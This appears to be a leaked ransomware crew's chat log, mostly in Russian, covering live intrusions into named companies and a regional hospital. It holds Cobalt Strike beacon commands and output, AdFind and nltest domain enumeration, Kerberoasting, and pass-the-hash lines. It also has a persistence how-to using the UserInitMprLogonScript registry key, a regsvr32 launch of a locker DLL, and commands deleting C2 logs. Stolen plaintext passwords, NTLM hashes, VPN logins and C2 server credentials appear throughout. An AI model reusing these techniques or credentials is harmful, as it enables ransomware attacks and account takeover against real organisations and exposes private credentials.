McsAgent.exe 2412 Console 0 16,440 K NT AUTHORITY\SYSTEM 0:11:23
McsClient.exe 2568 Console 0 7,952 K NT AUTHORITY\NETWORK SERVICE 0:00:05
swc_service.exe 2688 Console 0 4,668 K NT AUTHORITY\SYSTEM 0:00:00
swi_service.exe 2744 Console 0 29,560 K NT AUTHORITY\SYSTEM 0:00:05
smhstart.exe 3048 Console 0 3,848 K NT AUTHORITY\SYSTEM 0:00:00
hpsmhd.exe 3180 Console 0 12,280 K NT AUTHORITY\SYSTEM 0:00:01
cpqnimgt.exe 3244 Console 0 6,248 K NT AUTHORITY\SYSTEM 0:00:00
cqmgserv.exe 3304 Console 0 3,584 K NT AUTHORITY\SYSTEM 0:00:15
cqmgstor.exe 3352 Console 0 5,680 K NT AUTHORITY\SYSTEM 0:00:33
dfssvc.exe 3384 Console 0 3,884 K NT AUTHORITY\SYSTEM 0:00:00
sysdown.exe 3476 Console 0 2,036 K NT AUTHORITY\SYSTEM 0:00:00
cqmghost.exe 3632 Console 0 8,232 K NT AUTHORITY\SYSTEM 4:49:33
wmiprvse.exe 3660 Console 0 8,020 K NT AUTHORITY\SYSTEM 0:00:01
rotatelogs.exe 3852 Console 0 2,560 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3860 Console 0 2,540 K NT AUTHORITY\SYSTEM 0:00:00
hpsmhd.exe 3916 Console 0 18,236 K NT AUTHORITY\SYSTEM 0:00:01
rotatelogs.exe 3988 Console 0 2,572 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3996 Console 0 2,552 K NT AUTHORITY\SYSTEM 0:00:00
wmiprvse.exe 5168 Console 0 38,700 K NT AUTHORITY\NETWORK SERVICE 3:27:29
svchost.exe 5992 Console 0 12,236 K NT AUTHORITY\SYSTEM 0:00:22
alg.exe 6136 Console 0 3,696 K NT AUTHORITY\LOCAL SERVICE 0:00:00
logon.scr 4272 Console 0 2,004 K NT AUTHORITY\LOCAL SERVICE 0:00:00
minituner.exe 4816 Console 0 2.732 K NT AUTHORITY\SYSTEM 0:00:00
```
 
 
 
```
02/08/2020 03:56 PM 134 Sophos AutoUpdate 5.8.358 setup log 20200208 155610.txt
```я чет в метер кинуть не могугде утебя мап в общемчерез Yщадай dir C:\windows\tempа внутри не показываетчто такая папка естьон мне просто говоритdir Y:\ProgramData\как бы я пишу емув дирректории меня не пускалон вообще кривойне припомню?а на 2003 какой-то ав есть*да никого вроде не было вчера, ща переснимув списке процесов кто интересный есть?был бы вариант это обыграть через пш, но это 2003только туда уязвимость былабля 2003я ж писаля сам добавил ЛА через мс17 на сервер 2003из имеющихся кред никто в тот домен не прошёл с админ правами+ общего ЕАпроверь сюда текущего пользака который в домен проходил как ЛА``
[+] 192.168.254.92:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC01) (domain:MCKLRH)
[+] 192.168.254.93:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC02) (domain:MCKLRH)
``````
Get list of DCs in domain '' from '\\RadDC01.mcklrh.mig'.
    RADDC02.mcklrh.mig [DS] Site: Default-First-Site-Name
    RADDC01.mcklrh.mig [PDC] [DS] Site: Default-First-Site-Name
The command completed successfully
`из кмд`nltest /dclist:`вот щас ты угораешь)я так и не разобрался как список дк снимать через кмд, но полагаю в выводе smb_version всё дксписок дк получалось взять?[ ](https://mediaeveryone.com/group/lrhc-org?msg=SJGwmz8PfccJxvxKz) даи стояло по часуиногда повисало просто[ ](https://mediaeveryone.com/group/lrhc-org?msg=qEA6bRBWBs5fgK4MW) в таком варианте получается создаются файлы размером 0?тут либо 0 объектов, либо ERROR: 0x1``
AdFind.exe -f "(objectcategory=person)" -h 192.168.254.107 > ad_usr.txt
 
AdFind.exe -b DC=mcklrh,DC=mig -f "(objectcategory=person)" > ad_usr.txt
 
AdFind.exe -b DC=mcklrh,DC=mig -f "(objectcategory=person)" -h 192.168.254.107 > ad_usr.txt
``удалённо делал такэто если роняюсоздаёт 0 байт файлы``
C:\ProgramData\AdFind.exe -f "(objectcategory=person)" > C:\ProgramData\ad_usr.txt
C:\ProgramData\AdFind.exe -f "objectcategory=computer" > C:\ProgramData\ad_comp.txt
C:\ProgramData\AdFind.exe -f "(objectcategory=organizationalUnit)" > C:\ProgramData\ad_ous.txt
C:\ProgramData\AdFind.exe -subnets -f (objectCategory=subnet) > C:\ProgramData\subnets.txt
C:\ProgramData\AdFind.exe -f "(objectcategory=group)" > C:\ProgramData\ad_group.txt
C:\ProgramData\AdFind.exe -gcb -sc trustdmp > C:\ProgramData\trustdmp.txt
```[ ](https://mediaeveryone.com/group/lrhc-org?msg=ZWhp95o9pM6t8Hj8F) дай команду запуска + содержимое батника + команду копирования[ ](https://mediaeveryone.com/group/lrhc-org?msg=XwZdctaDSWS7Rjkjr) ,или даже так не работает?ты че угараешь надо мнойи снять вмиком?а в чем проблема адфайнд закинуть в трастовую тачкуяхунини ад инфуя ж говорюно толку тоон работает))))дат е у тебя в траст вмик работает?а к нему замапил трастя сейчас в мсф протянул текущий домену меня там свой ЛАтак нет жечерез мс17?у тебя точка входа в траст одна получается?без флага кипи дл не удаляетсяно сессии нетпш/рандлпроцесс в кобуни в тпшни в мсфвообще никудапритянуть траст тоже не получилосьокей понялпробовал ронять в трастовый домен ехе и батник и удалённо запускатьпробовал в текущем домене с указанием трастового домена/хоста дк трастового доменая описал это)как снимал ад с трастов?и последний вопрос чтобы закрыть этот диалогтак понятно?а он мне - 0 объектовя же знаю, что там как минимум несколько компов на серверной виндесли бы это были не компыпоследнее можно бы посчитать правдивыми мне вываливало либо ошибку, либо зависало, либо 0 объектови так уже пытался снять ад инфупотом добавил туда ЛА своегоиз трёх трастов один в карантине
из двух оставшихся доступ есть в один
в этом одном я через мс17 запросил ДА и ЕАя же всё описализ трастакакиха как ты нашел тогда юзеров....файл был пустойи когда она былаошибка в консолитак у тебя ошибка была или я не пойму?я трасты переснимал без вывода в файл, а файлы 0 байт смысл литьты не заливаешь файлы в конфукербы не снимал, сейчас займусьесли 1, то я переснимал вчера трасты и там ничего не изменилось
если 2, то я уже написал, что снять их не вышло[ ](https://mediaeveryone.com/group/lrhc-org?msg=TScXrhybTsQ7gZhsa) в плане переснять с текущего домена или ад инфу из самих трастов?``
ОБНОВЛЕНИЕ добавлен функционал варианта запуска локера, что снимает часть АВ детектов при дропе на диск
Запуск через regsvr32

regsvr32.exe /s locker.dll - без аргументов
regsvr32.exe /s /n /i: "тут аргументы" - с аргументами
``#corp-televisa-com-mx#pcsb-orgчто у вас в работе на данный момент?спасибо`yufdvfte5645warKHAGBSD`380fd7621d03826307b8993ad84c2ecf)жду хешиэто в корне все меняет)аа, ну раз нажал не доверять...на тилюфонину не доверять то я нажалзаряжатсяс этих есть хэши, местами клиры[ ](https://mediaeveryone.com/channel/general?msg=MpgDjanMwbZxXyA6c) к рабочему пк вы цепляли личный айфон?но вот че естьпридется снова запачкаться и пошерстить конференцииу меня тоже не все остались после переустановкиЯ чищу сразу все после закрытия весь комп. Обливаю святой водой.я не говорю о последней неделедастоп, вообще за все время работы?я говорю о всех кейсах за все время)там в архиве 2 файла, 1 - нтлм, 2 - клиры40 архивов качать не буду)все нтлмы в один архивмешать в один файл не надоглавное делите группы на одинаковыеоба формата сойдутв файле только нтлм?
```
c933798f947972ca9d08ba805008d6ca
```
или так пойдет?
```
CORP\lkperezcer:::8d3fe083b7e1fcb6f7a069fb8d7a75f5:::
``[ ](https://mediaeveryone.com/channel/general?msg=EQ2NwKzr46SjeK49M) глухо. не пускает, куки протухливсе ваши нтлм мне в архивы соберите из своих кейсовмои отвались - попробую перезайтив т ч из публичных ресурсову вас задача максимум на пол часа - собрать максимально большие списки чистых паролей+у вас сети в работе естьdobre rankuтак по задачам на сегодняа, все окЭто странновы у меня двоем в сетиНа базетут всегде?hiВсем приветhi:moyai:что логи хранятся в папкеда и в блоге говоритсякак я понимаюа распаковываетсякобальт же не через инсталта свитсяда и вряд ли логи будут где-то ещёкуча папок вообще пустыенарыл только логи и бэкапы убунтысделаешь рестарт упадут старые сессиискорее в каком то другом месте лежит бэкапесть вариант рестарт сделать?может быть такое, что сервер их помнит тк они были удалены во время его работы?``
root@hostname:~/cobalt/logs# ls
201203
root@hostname:~/cobalt/logs# cd 201203
root@hostname:~/cobalt/logs/201203# ls
events.log weblog_443.log

```решение на тебетут я тебе не подскажуда вижуsyncing beaconlogно опять такитак там с логами ничего не связано большеточно те логи почистил?)``
root@hostname:~/cobalt/logs# rm -r *
root@hostname:~/cobalt/logs# ls
root@hostname:~/cobalt/logs#

``к`~/cobalt/logs/` эту папку очистинужно было прям все логи за все числа удалить?
root@hostname:~/cobalt/logs/201201# ls
root@hostname:~/cobalt/logs/201201#

``все равно логи осталисьвторого и ретьего там в логах только инфа о том, что я зашёл и вышелэто за первое числону и папки rm -r *ну 2 лога перенёс в /home/
остальное rm * сдела ты все логи удалил?на серваке удалил содержимое папки 201201у меня ни логов, ни архивов нетчтобы логи синхронились вместеи локальный клиент почистиснеси тогда содежимое папки логовблядоходит до 20к и начинает по 1 байту в секундуа не наоборотну лог он же сохранятеся из действий в кобене понял?в хоум переложилкак это должно помочь? я просто зайду в кобу и она создаст новый точно такой-жевыкинь за папку кобыда)))это же лога ну даотсюда`~/cobalt/logs/201201/139.62.193.40`вот сюда положил
`~/cobalt/logs`перемести лог в другое местоадфайнд проклятыйвот он``
beacon_1851575246.log
```))окейгод-месяц-числоа это датаглянь за то число на котором была проблема``
root@hostname:~/cobalt/logs# ls
201020 201023 201026 201029 201101 201104 201107 201110 201113 201116 201119 201122 201125 201128 201201
201021 201024 201027 201030 201102 201105 201108 201111 201114 201117 201120 201123 201126 201129 201202
201022 201025 201028 201031 201103 201106 201109 201112 201115 201118 201121 201124 201127 201130 201203

``все удалять?логов уймаsshcc[``
root@104.243.40.126:13063
f826w8LY1XdqJnrmtr1inZqLv2UAPkk4ecv
```а я тебе и не давал доступ)`ssh: connect to host 104.243.40.126 port 22: Connection refused`
`ssh: connect to host likenic.com port 22: Connection refused`
`ssh: connect to host likenic.com port 38542: Connection refused`по ссх не пускает кстау меня на 21556 фризугу``
104.243.40.126:38542
JI07HSLOl2MtjxWe0UhqpolvHLJPZCAcL6M
```дай мне доступ в кобу где вся эта хуйня происходитчто за тема "не получается" и ничего не пробовать при этом чтобы починить? )ну зайди по ссх историю биконаглухоманьгде могли остаться доступы тудаи дай мне доступробуй зайти в другую кобуи как быть?бррне пускает в цитрикс``
https://vlab.unf.edu/vpn/index.html
N01447311
Commercial5207!
```так и делаю)проверять лучше с хоста откуда доступыс той же тачки+в идеале на той же тачке бы вообще)?сокс открыт в том же диапазоне где хост с которого сняли логины/не знаю, не сталкиваляsonic wall, не пускает с нашего дедика, креды валид`https://10.0.254.1:44433/cloudBackupSettings.htmlhttps://10.0.254.1:44433/main.htmlhttps://10.0.254.1:44433/postlogincheck.htmltext/x-snwl-prefstext/x-snwl-prefs`@tl2 или есть другие варианты как быть?и смотреть бэкапынадо доступы в их лк искать тамсейчас проверю серва где нашлис дкхех, нет)сокс кинут оттуда где взяли доступы?egl_admin\E@gle@x1s3030и креды валидвидимо только по рдп с их сервеработает, но с дедика не пускаетт е вцентр нашли с доступами и только ав?ну да возможнопри запуске билда его может удалить при подозрительном поведенииа не удалятся на статике?)на некторых серверах стоят по 3-4 едр лолнону криптерчто за стартер?и вроде не трогается ничемНуу, при выключеном виндефе стартер не удалятсяглавное чтобы вы знали куда зайти чтобы попасть в админкутогда снимаем браузер, либо заходим по рдп на его пк где доступ вебрут и делаем все оттудас большой вероятностью в вебруте стоит двухфакторка на телефонsuperlogin
```
URL : https://accounts.logme.in/ ( https://accounts.logme.in/login.aspx )
Username: tomw@itc-us.com
Password: Logmein123
``````
--- Chromium Credential (User: briang) ---
URL: http://itc-ship01/
Username : briang
Password : bdg2301

--- Chromium Credential (User: briang) ---
URL : http://itc-plm01/
Username : briang
Password : 194880195718849108860819488019597884910886001948801958988491088605194880195528849108854019488019538884910885421948801954088491088524

```
збс пасс )10.0.0.20
```
Bitdefender
Malwarebytes Anti-Exploit
Malwarebytes' Anti-Malware
Seagull Security (хз что это)

``````
UserDomain : ITC
UserName : superlogin
ComputerName : ITC-DC-SVR01.ITC.LOCAL
IPAddress : 10.0.0.14
SessionFrom :
SessionFromName:
LocalAdmin :
``````
UserDomain : ITC
UserName : superlogin
ComputerName : ITCMA-FILE02.ITC.LOCAL
IPAddress : 10.0.0.38
SessionFrom :
SessionFromName:
LocalAdmin :
``более эфективно в плане сервисных акковпопробуй через sharpview захантить - он иначе ищетя уже и с токеном самого суперлогина этого попробовалс токеном, да@user8 под ДА токеном запускал?
если да то все равно может не отработать потому что будет авторизационных ДК ивентов, если аккаунт сервисный какой-тос токеном ДА на ДК
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe superlogin
[*] Tasked beacon to run .NET program: SharpSniper.exe superlogin
[+] host called home, sent: 113727 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.
``есть такой интересный админ
```
User name superlogin
Full Name Superlogin
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 5/21/2018 9:56:11 PM
Password expires Never
Password changeable 5/21/2018 9:56:11 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators *ADSyncAdmins
Global Group memberships *Server Management *Discovery Management
                             *Hypervisor Access - V*Domain Users
                             *VMware Admins *Domain Admins
                             *Records Management *All ITC
                             *Recipient Management *Mailbox support
                             *Public Folder Managem*Organization Manageme
                             *SHOPTRAK CHINA USERS *SQL Access - FULL SER

``на админских ак есть такая штука на рабочем столе
```
screen mode id:i:2
use multimon:i:0
desktopwidth:i:1920
desktopheight:i:1080
session bpp:i:24
winposstr:s:0,1,158,316,1182,1040
compression:i:1
keyboardhook:i:2
audiocapturemode:i:0
video playback mode:i:1
connection type:i:7
networkautodetect:i:1
bandwidthautodetect:i:1
displayconnectionbar:i:1
enableworkspacereconnect:i:0
disable wallpaper:i:0
allow font smoothing:i:0
allow desktop composition:i:0
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:0
disable cursor setting:i:0
bitmapcachepersistenable:i:1
full address:s:remote.itc-us.com
audiomode:i:0
redirectprinters:i:1
redirectcomports:i:0
redirectsmartcards:i:1
redirectclipboard:i:1
redirectposdevices:i:0
autoreconnection enabled:i:1
prompt for credentials:i:0
negotiate security layer:i:1
remoteapplicationmode:i:0
alternate shell:s:
shell working directory:s:
gatewayhostname:s:
gatewayusagemethod:i:4
gatewaycredentialssource:i:4
gatewayprofileusagemethod:i:0
promptcredentialonce:i:0
gatewaybrokeringtype:i:0
use redirection server name:i:0
rdgiskdcproxy:i:0
kdcproxyname:s:
drivestoredirect:s:*
authentication level:i:2
username:s:itc\
devicestoredirect:s:*
``когда туда полезете не забудьте прокси с пк админаwebrootanywhere.com/v1/Account/loginа админка где? снаружи?user9user4user3https://www.ixbt.com/power/ups/multilink.shtmlна ДК
```
beacon> shell type C:\MultiLink\README.txt
[*] Tasked beacon to run: type C:\MultiLink\README.txt
[+] host called home, sent: 59 bytes
[+] received output:
README.TXT for Liebert MultiLink

Liebert developed MultiLink to protect computers from costly damage such as
loss of data resulting from power failures -- from single computers to large
networks. MultiLink constantly monitors one or more Liebert Uninterruptible
Power Supply (UPS), warns computer users of impending power loss and initiates
graceful operating system shutdowns when needed.

MultiLink on a host computer communicates with a Liebert UPS using network or
direct cable connections to detect loss of utility power and the status of the
UPS battery. For network communications, MultiLink employs the SNMP protocol
and IP addresses. For direct cable connections, MultiLink uses either serial
communications or contact closure, depending on the UPS model.

The MultiLink Advanced Shutdown version adds data analysis and notification
capabilities to the standard MultiLink shutdown features. This product permits
configurable responses to UPS status changes, including support for e-mail,
pagers, and command actions.  MultiLink Advanced Shutdown also offers data
logging functionality to capture and trend historical data for trouble-shooting
and analysis.

For updates to MultiLink software or to purchase the MultiLink Advance Shutdown
version, visit http://multilink.liebert.com.


Technical Support:

U.S.A +1 800-222-5877
Outside the U.S.A. +1 614-841-6755
France +33 (0) 1 43 60 01 77
Germany +49 89 90 50 070
Italy +39 02 98250 324
Netherlands +31 (0) 33 2474072
U.K. +44 (0) 1628 403200
Spain +34 902 100 494
E-mail liebert.monitoring@emerson.com
Web Site http://multilink.liebert.com


The Company Behind the Products:

With over a million installations around the globe, Liebert
is the world leader in computer protection systems. Since
its founding in 1965, Liebert has developed a complete range
of support and protection systems for sensitive electronics:

- Environmental systems: close-control air conditioning from
  1.5 to 60 tons.
- Power conditioning and UPS with power ranges from 250 VA to
  more than 1000 kVA.
- Integrated systems that provide both environmental and power
  protection in a single, flexible package.
- Monitoring and control -- from systems of any size or location,
  on-site or remote.
- Service and support through more than 100 service centers
  around the world, and a 24/7 Customer Response Center.


Copyright (c) 1997-2013 Liebert Corporation.
All rights reserved throughout the world. Specifications subject
to change without notice.
Liebert, the Liebert logo, and MultiLink are registered
trademarks of Liebert Corporation.

``так вот он чуть вышепо ад 6956 были живыскажи сразу сколько серверовпингану еще сервера и начинаемразбираем билд определяем метод`SIODFGO&DSIUgfsgFUT%UYESYTGU`user8user7user4user3)вдруг пригодится таки)))``
$krb5tgs$23$*agpm_admin$korbel.com agpmadmin
``EDR``
Netwrix.korbel.com [10.10.1.94] NETWRIX SERVER
```
```
URL : https://www.netwrix.com/sign_in.html
Username : ben.mandeville@korbel.com
Password : vZjFu3cH
``vSphere
```
https://vcenter.korbel.com/
Username : ben.mandeville@korbel.com
Password : 1234qwerASDF!@#$
``спокойнойббк 6окей +2 часаЭто отработвл 14 часов на отдых 10 из которых 2 на дорогуподготовка к закрытиюПочему так рано?завтра к 4тогда на этом вседатут закончили?прибиваю дкживых 99
42 восстановили
42 закрыто\примаплено\убиты процесы
есхы потерты
рубрик потертну все получаетсяMAIN\blove wingnut12#
MAIN\Administrator cr1spy173
MAIN\rthomas !@#monstrosity2002``
172.93.110.218:54536
wEjNq0mz7Dji7TjM6Xv3LIovTZIndMQkbjj
``````
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org

ERROR: The RPC server is unavailable.
```

```
PYXIS-CCE-PROD.main.crispregional.org

ERROR: Logon failure: unknown user name or bad password.
```

```
NovaNet.main.crispregional.org

не вывел тасклист без ошибки
``````
Admin
G0F0rw@rd123!
10.75.0.170
10.75.0.171
10.75.0.172
10.1.0.170
10.1.0.171
10.1.0.172
``````
crhsesxi20.main.crispregional.org
crhsesxi21.main.crispregional.org
crhsesxi22.main.crispregional.org
crhsesxi23.main.crispregional.org
crhsesxi24.main.crispregional.org
crhsesxi25.main.crispregional.org
crhsesxi26.main.crispregional.org
crhsesxi27.main.crispregional.org
``всего
```
pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
3MCDIDAT.main.crispregional.org
ADSelfService.main.crispregional.org
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-APP.main.crispregional.org
NovaNet.main.crispregional.org
HISCODER.main.crispregional.org
```не пошифр
```

pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
3MCDIDAT.main.crispregional.org
ADSelfService.main.crispregional.org
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org
``FILESTORESQL.main.crispregional.org
DHCP.main.crispregional.org
CRR-WEB-WS01.main.crispregional.org
CRR-WEB-FS01.main.crispregional.org
CRR-WEB-BG01.main.crispregional.org
CRR-PRT-SER.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRHSWDS.main.crispregional.org
crhs-security.main.crispregional.org
AHTNH1.main.crispregional.org
ADSelfService.main.crispregional.org
3MHIS.main.crispregional.org
3MCDISTEST.main.crispregional.org
3MCDIDAT.main.crispregional.org``
pth MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24
``````
TrinisysQA-APP.main.crispregional.org
Trinisys-A8.main.crispregional.org
Trinisys-A7.main.crispregional.org
Trinisys-A6.main.crispregional.org
Trinisys-A5.main.crispregional.org
Trinisys-A4.main.crispregional.org
Trinisys-A2.main.crispregional.org
pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
PyxisPharmTest.main.crispregional.org
PyxisPharmLive.main.crispregional.org
pyxismed.main.crispregional.org
PYXIS-DB.main.crispregional.org
PYXIS-CCE-TEST.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-APP.main.crispregional.org
pyxisanest.main.crispregional.org
NovaNet.main.crispregional.org
Medisolv.main.crispregional.org
INFOTVSV5.main.crispregional.org
INFOTVSV4.main.crispregional.org
INFOTVSV3.main.crispregional.org
InfoTVsV2.main.crispregional.org
INFOTVSV1.main.crispregional.org
HISCODER.main.crispregional.org
GEPACsTestWS
GEPACS-TestCCG
GEPACS-CCG
FILESTORESQL.main.crispregional.org
DHCP.main.crispregional.org
CRR-WEB-WS01.main.crispregional.org
CRR-WEB-FS01.main.crispregional.org
CRR-WEB-BG01.main.crispregional.org
CRR-PRT-SER.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRHSWDS.main.crispregional.org
crhs-security.main.crispregional.org
AHTNH1.main.crispregional.org
ADSelfService.main.crispregional.org
3MHIS.main.crispregional.org
3MCDISTEST.main.crispregional.org
3MCDIDAT.main.crispregional.org
``еще неттак ну что, добили?
10.1.21.95
10.1.21.98
``````
crhsesxi24.main.crispregional.org
crhsesxi27.main.crispregional.org
``eThoit4Rueh4aigheiDeiquaугу значит ок``
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:/ProgramData/pshashes.txt -append -force -encoding UTF8 into 4540 (x64)
``команда включает в себя хешкат параметр?это инвок-керб снимал из тулчейнаформат хешката?нетузакрепилсюда сразу дублируйа ты закрепил?кербы скинул тл2убез ответагрупы и оушки не снимаются чотаотпиште в групы в которыз работайтеТакс, ну давайте посмотрим что сделали пока меня не было и в целом что сделаноПривет!Всем приветhiубираем свои файлы и до завтратогда в слипДавсе поставили?До вечерадакстати дл собирали с флагом -keep?по 1-2 шт где есть вомзожностьвезде поставили?``
beacon> shell reg query HKCU\Environment
[*] Tasked beacon to run: reg query HKCU\Environment
[+] host called home, sent: 57 bytes
[+] received output:

HKEY_CURRENT_USER\Environment
    Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
    TEMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp
    TMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp
    OneDrive REG_EXPAND_SZ C:\Windows\system32\config\systemprofile\OneDrive
    UserInitMprLogonScript REG_SZ rundll32.exe C:\Windows\Temp\STA-NURSEAL-20201020-2033.dll,entryPoint

``````
	- Загружаем полученную DLL в доступную для записи директорию
	- ПКМ на сессию, persistence - non-elevated - userinitmprlogonscriptkey
	- Вписываем Command: rundll32.exe C:\temp\keep64.dll,entryPoint (ОБЯЗАТЕЛЬНО указываем полный путь до dll файла, ОБЯЗАТЕЛЬНО переименовываем dll файл перед загрузкой во что-нибудь более "органичное" в зависимости от окружающих его файлов)
	- Запускаем
	- Проверяем создалась ли запись в реестре командой бикона shell reg query HKCU\Environment
```1 это обязательно и 2 если все пойдет хорошозавтра к 4 и завтра обязательно закрывает 1-2 сетипоставьте в текущих сетях новых и можете идтисоберите себе егоhttps://github.com/0xthirteen/StayKitокили в конце этого месяцаили через месяцтак что новые по факту получения сразу проверяйтекогда?старые кобы потом отключаткак факто вы из англии[ ](https://mediaeveryone.com/channel/general?msg=ZxszvNDaKbZKfk3fL) take itразбирайте у кого еще нет``
23.106.160.195
https://topevi.com
-
185.150.190.113:61718
O5xFflqDG7LDQJUDbdtkkj54zQ8QDVMMI0W
``коба``
74.118.138.108
https://wolfnew.com
-
209.222.98.96:32878
onsOJxzeGz75Nt2p0tGYzjn7oTi5Eo6F644
```Парни пишем сюда по VPN https://helpdocpt.club/forums/vpn.11/ как чё кого``
user3
user3 @user3
💬
02:00
Домен
ing server: STAKC-DC2019.STAKC.local:389

tl1
Team Lead 1 @tl1
Admin
02:01
т е конфу создать?

user3
user3 @user3
💬
02:01
да
user 7,4,9,3

``О которой я тебя просилкакой?Конфа будет или нет?либо taken красный цветанк не показательвсе anc или висятестьа вроде и нетуоктам еще открытые свободные естьчек дальшеюзер оффDC
```
 Server Name IP Address
 ----------- ----------
 FISHUSA-DC 192.168.1.91
``EA
```
Administrator
``DA
```
Administrator dc-admin djpastore3219
percona3487

``здравствуйте тимлидушки* Username : nddevbernst
	 * Domain : JDOSSN
	 * NTLM : 5b622ad5d550408ed6260c2b8fb185cc>sAMAccountName: nddevkremmeкреды сегодня сменили
это новые
pth JDOSSN\ndmicjsater 67595f137f5908e3ed202bc4b14aa9я вижу тут в плане эскалации просто планомерное изучение файлов/шар/доступных АРМ/содержимого браузеров/кэша/почты.не керберостя именно про тикеты сейчасобязательно проверяйте на доступный хостах какие в памяти есть керберос тикетыда в хоумдиры тоже заглянему них какие-то технические права даже есть как видишьу вас есть пользаки тут которые не самые хуевые так тохоумдиры пользователей смотритено попасть на них не выходит``
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)
[+] received output:
172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)

[+] received output:
172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN)

[+] received output:
172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN)

[+] received output:
172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN)

[+] received output:
172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN)

[+] received output:
172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN)

[+] received output:
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)

[+] received output:
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)

[+] received output:
172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN)
Scanner module is complete
``иначе обычно работать ничего не можетсервера будут видеть другие сабнеты и сегментыищите сервера.значит тут разграничение правил доступа идет через групы как разагаверно?дакакого-тоя могу предположить что вы не можете выбраться сабнетасудя по имеющимся на текущий момент пользакамтам хорошая связка показана импакета с лсаси с бладхаундомбудем пробовать.имет варианты дампа лсас и его дешифровкион хорошпоиграйтесь с инструментомработает опираясь на бладхаунд если правильон настроенну и прямого пути до ДА нетну вот lsassyда, там план атаки вроде есть, но он опирается на тачки, которых не видно в сети..а при некоторых - нет = )при некоторых условияхтам вцелом понятно какие групы адмиятну насколько я помню опирается на состав managed objects если таковой прописанага, только поменял комп и она на старом осталасьснял?да я уже)я признаться этой штукой не пользуюсь и обычно стараюсь аккуратно с крупными это будет дико шумнопопробуем))можно еще снять bloodhound....додумать и проверить догадку)а как то можно узнать, какие право дает например NDLEADING_Computer_Account_Adminsпальпируя сеточкупричем без просто брута а чисто аккуратно и нженоесли приглядетьсявообщем
тут есть куда жать кнопки дальше>memberOf: CN=NDLEADING_Computer_Account_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local

вот еще у девочки есть такая групаих хоум диры под их токеном при пряом браузинге "подтягиваемой" директории``
>homeDirectory: \\jdossn.local\homedirs\NDLEADING\ndcarhsherm
``тут хоум дира подтягивается с ФСу этих пользаков тачки пустые да теперь еще одна особенностьрандомно
посмотрел куда это дело катитна OU=NDLEADING
и на OU=SD**я бы почекал этого юзератеперь ОБРАТНО в ад_компсесть!а есть ли OU=NDLEADING ?теперь дальшеOU=WIRIESTERER
тоже ОУшкатакое есть
в ад_компсальтернативная группа>memberOf: CN=WIRIESTERER_SD_Adminsтакого нет. sd это походу префикс означающий локациюидем логическиищем дальше ручкамисамое очевидное - поиск по OU=SDвопрос - что такое SD?
ищем на него ответа вот что придумать с пассворд_ресет ...который в группе SD_Adminsвот у нас есть этот хренсмотрите
читаем внимательно АДда, я тоже обратил внимание. Под адми в основном по сети и двигалсяили вот эта

```
>memberOf: CN=NDLEADING_SD_Admins,OR=Groups,OR=NDLEADING,OR=Customers,DC=jdossn,DC=local
```смотрите какая группка интересная не?>memberOf: CN=NDLEADING_Password_Reset_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local``
User name ndcarjjohns
Full Name Justin Johnson
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/15/2020 7:35:46 AM
Password expires 1/7/2021 7:35:46 AM
Password changeable 10/16/2020 7:35:46 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\ndcarjjohns
Last logon 10/19/2020 7:33:11 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_All_Users
                             *NDLEADING_EQUIP_Users*NDLEADING_All_Email
                             *NDLEADING_SD_Technicians*NDLEADING_ALL
The command completed successfully.

``````
User name ndcardkolst
Full Name Darlene Kolstad
Comment carrington, nd
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/20/2020 1:54:07 PM
Password expires 1/12/2021 1:54:07 PM
Password changeable 10/21/2020 1:54:07 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\ndcardkolst
Last logon 10/22/2020 7:31:17 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *NDLEADING_ACCOUNTING *Domain Users
